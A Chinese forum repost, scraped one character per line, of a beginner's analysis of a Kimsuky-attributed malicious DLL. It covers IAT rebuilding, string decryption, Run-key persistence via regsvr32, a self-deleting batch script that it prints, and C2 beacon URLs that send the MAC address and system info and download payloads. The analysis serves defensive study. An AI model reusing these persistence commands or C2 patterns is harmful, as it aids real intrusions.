论坛
BBS
空间测绘
发表
发布文章
提问答疑
搜索
您还未登录
登录后即可体验更多功能
立即登录
我的收藏
提问答疑
我要投稿
Web安全
[1876] 2020-12-12_关于Kimsuky的一次恶意样本分析小记
文档创建者:
s7ckTeam
浏览次数:
1
最后更新:
2025-01-16
Web安全
1 人阅读
|
0 人回复
s7ckTeam
s7ckTeam
当前离线
积分
-54
6万
主题
-6万
回帖
-54
积分
管理员
积分
-54
发消息
2020-12-12_关于Kimsuky的一次恶意样本分析小记
关
于
K
i
m
s
u
k
y
的
一
次
恶
意
样
本
分
析
小
记
不
懂
就
不
懂
D
a
y
1
安
全
团
队
2
0
2
0
-
1
2
-
1
2
前
言
前
言
最
近
才
开
始
关
注
朝
鲜
半
岛
相
关
的
攻
击
行
为
,
在
看
E
S
T
S
的
相
关
文
章
,
因
为
刚
刚
开
始
关
注
朝
鲜
半
岛
,
拉
撒
路
我
就
不
考
虑
了
。
浏
览
的
重
点
着
重
于
K
i
m
s
u
k
y
相
关
P
E
样
本
。
看
到
最
近
的
一
篇
和
P
E
有
关
的
样
本
分
析
文
章
为
h
t
t
p
s
:
/
/
b
l
o
g
.
a
l
y
a
c
.
c
o
.
k
r
/
3
0
9
1
。
观
看
该
文
章
总
结
的
攻
击
链
应
该
为
“
W
S
F
恶
意
脚
本
文
件
-
>
释
放
恶
意
D
L
L
文
件
和
与
C
O
V
I
D
-
1
9
有
关
的
迷
惑
性
H
W
P
文
件
”
。
依
据
文
章
样
本
链
除
了
最
后
一
环
有
通
信
行
为
,
其
他
样
本
应
该
是
以
B
a
s
e
6
4
编
码
后
硬
编
码
在
脚
本
文
件
中
的
,
拿
到
初
始
样
本
可
以
不
依
据
通
信
就
还
原
整
个
攻
击
链
,
因
此
希
望
能
够
拿
到
初
始
链
的
W
S
F
脚
本
样
本
。
依
据
确
定
I
O
C
只
有
一
条
域
名
,
于
是
拿
着
I
O
C
去
V
T
、
微
步
、
a
n
y
r
u
n
上
找
相
关
样
本
,
但
是
最
终
只
找
到
了
最
后
所
释
放
的
d
l
l
。
那
就
只
好
分
析
d
l
l
了
。
动
静
分
析
动
静
分
析
首
先
静
态
用
I
D
A
观
察
d
l
l
m
a
i
n
函
数
,
发
现
在
该
函
数
中
就
获
取
了
一
个
当
前
模
块
路
径
就
返
回
了
,
可
以
确
定
相
关
恶
意
行
为
不
在
d
l
l
加
载
的
时
候
执
行
。
使
用
L
o
a
d
e
r
P
e
观
察
该
D
L
L
的
导
出
函
数
,
具
有
四
个
导
出
函
数
。
一
一
查
看
后
发
现
恶
意
行
为
在
这
个
导
出
函
数
之
中
。
直
接
上
O
D
,
然
而
在
调
试
的
时
候
发
现
,
有
一
些
库
函
数
并
没
有
出
现
在
I
A
T
中
,
在
动
态
调
试
的
时
候
发
现
有
了
调
用
,
在
I
D
A
中
存
在
一
个
函
数
指
针
数
组
。
然
后
我
开
始
怀
疑
是
在
初
始
化
的
时
候
有
调
用
。
D
l
l
R
e
g
i
s
t
e
r
S
e
r
v
e
r
(
)
根
据
引
用
发
现
有
对
该
指
针
数
组
赋
值
的
行
为
。
该
赋
值
行
为
存
在
在
函
数
之
中
。
继
续
了
解
这
个
函
数
赋
值
行
为
从
哪
里
来
的
。
发
现
该
函
数
也
是
存
在
于
一
个
函
数
指
针
数
组
之
中
。
查
看
引
用
,
发
现
在
C
i
n
i
t
函
数
中
有
调
用
,
猜
测
到
就
是
在
初
始
化
的
时
候
循
环
调
用
了
函
数
指
针
数
组
进
行
自
定
义
一
个
类
似
I
A
T
。
为
了
方
便
I
D
A
浏
览
,
我
选
择
在
运
行
到
W
i
n
m
a
i
n
的
时
候
直
接
d
u
m
p
出
来
,
重
建
I
A
T
。
可
以
有
两
种
重
建
方
式
,
一
种
方
便
快
捷
,
O
D
d
u
m
p
的
时
候
选
择
重
建
I
A
T
即
可
。
1
0
0
0
9
4
1
0
还
有
一
种
是
新
建
一
个
节
表
。
将
I
A
T
整
体
移
走
。
分
模
块
重
新
构
建
I
A
T
。
这
一
种
有
个
缺
点
,
就
是
你
还
得
去
修
改
代
码
段
中
相
关
函
数
调
用
的
地
址
都
要
变
为
你
重
建
的
I
A
T
之
中
。
相
关
字
符
串
基
本
上
都
是
加
密
的
,
有
一
篇
文
章
介
绍
了
类
似
的
加
密
;
可
以
参
考
博
文
h
t
t
p
s
:
/
/
s
f
k
i
n
o
.
t
i
s
t
o
r
y
.
c
o
m
/
7
7
。
字
符
串
可
能
都
是
以
s
t
r
i
n
g
这
种
类
型
进
行
保
存
的
,
和
s
t
r
i
n
g
字
符
串
内
存
布
局
很
像
。
但
我
记
得
s
t
r
i
n
g
头
四
个
字
节
应
该
保
存
的
是
指
向
自
己
的
指
针
才
对
。
获
取
环
境
变
量
%
P
R
O
G
R
A
M
D
A
T
A
%
对
应
的
目
录
。
将
解
密
的
字
符
串
进
行
拼
接
,
构
造
p
a
t
c
h
.
d
l
l
的
保
存
路
径
。
创
建
目
录
。
继
续
拼
接
。
该
字
符
串
一
个
是
用
作
r
u
n
键
的
值
,
键
名
;
另
外
一
个
是
用
作
判
断
是
否
该
模
块
在
规
定
的
目
录
下
,
如
果
不
是
的
话
将
将
d
l
l
拷
贝
纸
规
定
的
目
录
,
然
后
会
获
取
临
时
目
录
以
及
临
时
文
件
路
径
,
尝
试
创
建
临
时
文
件
,
在
临
时
文
件
中
添
加
如
下
代
码
,
给
临
时
文
件
加
上
.
b
a
t
后
缀
然
后
执
行
该
b
a
t
文
件
,
可
以
看
出
该
b
a
t
文
件
就
是
删
除
d
l
l
原
本
所
在
的
路
径
和
自
身
,
最
后
以
该
字
符
串
为
创
建
进
程
参
数
进
行
进
程
创
建
。
b
a
t
文
件
代
码
:
C
:
P
r
o
g
r
a
m
D
a
t
a
S
o
f
t
w
a
r
e
M
i
c
r
o
s
o
f
t
W
i
n
d
o
w
s
A
u
t
o
P
a
t
c
h
p
a
t
c
h
.
d
l
l
C
:
P
r
o
g
r
a
m
D
a
t
a
S
o
f
t
w
a
r
e
M
i
c
r
o
s
o
f
t
W
i
n
d
o
w
s
A
u
t
o
P
a
t
c
h
r
e
g
s
v
r
3
2
.
e
x
e
/
s
"
C
:
P
r
o
g
r
a
m
D
a
t
a
S
o
f
t
w
a
r
e
M
i
c
r
o
s
o
f
t
W
i
n
d
o
w
s
A
u
t
o
P
a
t
c
h
p
a
t
c
h
.
d
l
l
"
W
i
n
d
o
w
s
D
e
f
e
n
d
e
r
:
r
e
p
e
a
t
d
e
l
"
C
:
U
s
e
r
s
a
d
m
i
n
D
e
s
k
t
o
p
P
a
t
c
h
.
d
l
l
"
i
f
e
x
i
s
t
"
C
:
U
s
e
r
s
a
d
m
i
n
D
e
s
k
t
o
p
P
a
t
c
h
.
d
l
l
"
g
o
t
o
r
e
p
e
a
t
d
e
l
"
%
~
f
0
"
之
后
创
建
一
个
名
为
的
互
斥
体
。
U
A
C
相
关
查
询
c
h
a
n
e
l
获
取
当
前
T
o
k
e
n
当
获
取
不
到
T
o
k
e
n
或
者
U
A
C
查
询
不
都
为
0
时
,
会
重
新
创
建
进
程
,
在
管
道
中
获
取
进
程
返
回
的
信
息
。
获
取
调
试
权
限
。
之
后
就
是
创
建
了
线
程
,
然
后
在
线
程
中
创
建
了
三
个
线
程
。
第
一
个
线
程
,
解
密
了
C
2
,
获
取
了
M
A
C
地
址
。
最
终
的
拼
接
为
。
p
1
为
十
六
进
制
的
M
A
C
地
址
。
解
密
数
据
包
头
,
对
u
r
l
发
起
访
问
。
将
返
回
的
数
据
保
存
在
临
时
目
录
中
的
临
时
文
件
。
读
取
临
时
文
件
对
应
字
段
,
判
断
类
型
,
然
后
执
行
对
应
操
作
,
因
为
C
2
无
响
应
,
没
有
返
回
文
件
,
我
只
能
通
过
K
i
m
s
u
k
y
往
常
的
行
为
和
I
D
A
静
态
观
察
来
猜
测
行
为
了
,
如
果
猜
错
了
,
望
大
手
子
轻
喷
萌
新
分
析
。
h
t
t
p
:
/
/
c
h
a
n
e
l
-
l
o
v
e
.
o
r
g
-
h
e
l
p
.
c
o
m
/
/
/
?
m
=
c
&
p
1
=
0
0
0
c
2
9
0
7
d
0
7
0
v
6
8
=
=
1
时
,
函
数
内
部
有
大
量
的
堆
空
间
申
请
释
放
,
修
改
堆
空
间
属
性
操
作
,
初
步
猜
测
是
对
s
h
e
l
l
c
o
d
e
解
密
内
存
加
载
。
当
V
6
9
=
=
2
时
候
,
猜
测
是
进
行
对
文
件
信
息
的
获
取
,
以
及
落
地
相
关
文
件
。
都
不
是
的
时
候
猜
测
为
执
行
C
M
D
命
令
,
执
行
结
果
通
过
管
道
获
取
。
第
二
个
线
程
为
获
取
系
统
信
息
,
拼
接
参
数
构
造
u
r
l
,
以
G
e
t
的
方
式
进
行
h
t
t
p
请
求
。
参
数
为
:
/
/
?
m
=
a
&
p
1
=
0
0
0
c
2
9
0
7
d
0
7
0
&
p
2
=
W
i
n
6
.
1
.
7
6
0
0
x
8
6
-
D
r
o
p
p
e
r
-
v
3
3
8
2
3
6
3
p
1
=
M
A
C
地
址
p
2
=
系
统
信
息
-
D
r
o
p
p
e
r
-
v
3
3
8
2
3
6
3
,
后
面
这
个
v
怀
疑
是
版
本
。
下
面
是
数
据
包
头
(
三
个
线
程
都
是
用
的
这
个
数
据
包
头
)
。
M
o
z
i
l
l
a
/
5
.
0
(
W
i
n
d
o
w
s
N
T
1
0
.
0
;
W
i
n
6
4
;
x
6
4
)
A
p
p
l
e
W
e
b
K
i
t
/
5
3
7
.
3
6
(
K
H
T
M
L
,
l
i
k
e
G
e
c
k
o
)
C
h
r
o
m
e
/
7
4
.
0
.
3
7
2
9
.
1
6
9
S
a
f
a
r
i
/
5
3
7
.
3
6
第
三
个
线
程
也
是
获
取
一
些
信
息
进
行
拼
接
。
h
t
t
p
:
/
/
c
h
a
n
e
l
-
l
o
v
e
.
o
r
g
-
h
e
l
p
.
c
o
m
/
/
/
?
m
=
e
&
p
1
=
0
0
0
c
2
9
0
7
d
0
7
0
&
p
2
=
a
&
p
3
=
f
5
e
6
6
e
2
e
e
8
9
a
3
1
2
8
a
a
f
c
a
3
3
2
7
b
1
8
7
1
0
e
e
9
d
e
a
a
a
0
p
1
=
m
a
c
p
2
=
a
p
3
=
d
l
l
一
段
内
容
的
摘
要
通
信
下
载
了
一
个
临
时
文
件
(
无
响
应
)
并
执
行
。
总
结
总
结
后
续
线
程
中
很
多
行
为
需
要
基
于
响
应
的
C
2
才
能
够
完
整
分
析
,
然
而
C
2
已
经
无
响
应
了
,
我
只
能
去
各
个
H
u
n
t
e
r
平
台
,
查
看
之
前
K
i
m
s
u
k
y
类
似
行
为
链
的
样
本
的
p
c
a
p
包
,
通
过
查
看
之
前
的
p
c
a
p
包
以
及
各
个
线
程
所
使
用
的
A
P
I
来
推
测
相
应
的
恶
意
行
为
。
新
手
分
析
,
还
有
很
多
分
析
不
到
位
的
地
方
,
望
大
家
多
多
包
涵
。
D
a
y
1
安
全
团
队
会
以
微
信
公
众
号
为
平
台
持
续
输
出
渗
透
测
试
、
代
码
审
计
、
W
i
n
d
o
w
s
逆
向
等
内
容
,
致
力
于
回
馈
安
全
社
区
,
提
高
网
络
安
全
普
及
程
度
团
队
成
员
:
h
t
t
p
:
/
/
t
e
a
m
.
d
a
y
1
.
t
o
d
a
y
/
D
a
y
1
团
队
招
擅
长
开
发
的
大
佬
共
同
发
展
自
动
化
有
兴
趣
者
欢
迎
投
递
8
2
9
7
3
2
4
0
@
q
q
.
c
o
m
阅
读
原
文
回复
举报
上一个主题
下一个主题
高级模式
B
Color
Image
Link
Quote
Code
Smilies
您需要登录后才可以回帖
登录
|
立即注册
本版积分规则
发表回复
!disable!!post_parseurl!
使用Markdown编辑器编辑
使用富文本编辑器编辑
回帖后跳转到最后一页
发表
Web安全